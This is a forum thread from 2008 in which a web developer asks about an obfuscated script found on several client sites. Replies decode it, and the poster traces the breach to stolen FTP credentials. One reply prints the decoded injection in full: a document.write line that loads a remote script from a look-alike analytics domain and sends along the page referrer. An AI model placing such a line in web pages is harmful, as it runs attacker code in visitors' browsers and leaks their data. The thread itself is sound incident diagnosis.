What is this code and where does it come from?

**Atli** · Oct 18 '08, 10:57 AM

Hi.

Where exactly on your pages is this showing up?
Do the pages use any data taken from the client?

What exactly do the malware applications that flag it say?

Without actually being able to read what the code does, my best guess would be that this was planted by some *cracker* to either try to steal information from your clients or to try to plant malicious code on their browsers. You really need to find out how they did it and plug that hole.

In any case, unless you figure out exactly what it is, I would get rid of it fast.
If this is some sort of malicious code, and it is being executed when people visit your site, it could very well be causing them any number of problems, which could even lead to your site being flagged by the anti-phishing programs. (But then again, I'm the paranoid type :P)

**gits** · Oct 18 '08, 12:05 PM

the script is some obfuscated javascript that adds the following code to your page:

Code:

<script language="javascript"> document.write( "<SCRIPT language=\"JavaScript\" SRC=\"http://www.googleanalitics.net/__utb.js?"+document.referrer+"\"><\/SCRIPT>" ); </script>

calling the shown url:

http://www.googleanalitics.net/__utb.js

is blocked by FF because of a potential security risk -> so I even would just remove the code and would try to trace down where it came from as Atli suggested.

kind regards

**sbcs** · Oct 18 '08, 09:06 PM

Thanks, Atli and gits--that tells me a lot. Some research on googleanalitics .net shows complaints going back to at least 2002. I fixed the pages as soon as I discovered the code on each one. Now I've got to figure out HOW they got infected. The "date modified" stamp on the server shows that the various pages were altered on July 3, 8 and 10. That four of my pages for different clients on different servers got infected randomly seems too coincidental, but if it's coming from me, why just those four and not any of the many others I maintain? Nightly sweeps by AVG 8.0 aren't showing anything on my machine, and there's no viewer input to any of the pages. I realize this is getting off the topic of the forum, but thanks again for your help--I'll post back FYI if I find out anything else.

**gits** · Oct 18 '08, 10:12 PM

may be the servers where infected/corrupted? try to ask the admins there ... may be they are aware of the problem ... or in case they are not, may be they could (and should) investigate that? in case you find out something it would be really great to post it here for people that might have similar problems in the future ...

kind regards

**sbcs** · Dec 1 '08, 05:51 PM

Several of the infected sites are hosted with GoDaddy. They checked server logs and found that the files were accessed using the hosting account username and password. The infected files were coming from an IP address that resolved to HostFresh in Hong Kong. It's become apparent that my WS_FTP .ini file was compromised and the information in it was used to access these sites. I've found that there is malware that looks for certain files on a computer and that the WS_FTP.ini file is a common target.

For what it's worth, out of about 50 sites in my WS_FTP.ini file, 8 were accessed--4 on GoDaddy and 4 on smaller hosting services. I have about 20 sites on LunarPages and none were accessed--not sure why.

**davebirchall** · Jan 8 '09, 07:01 PM

I had a similar experience. Same FTP, same script, different host

This thread has been hugely valuable.

What is this code and where does it come from?

What is this code and where does it come from?

Comment

Comment

Comment

Comment

Comment

Comment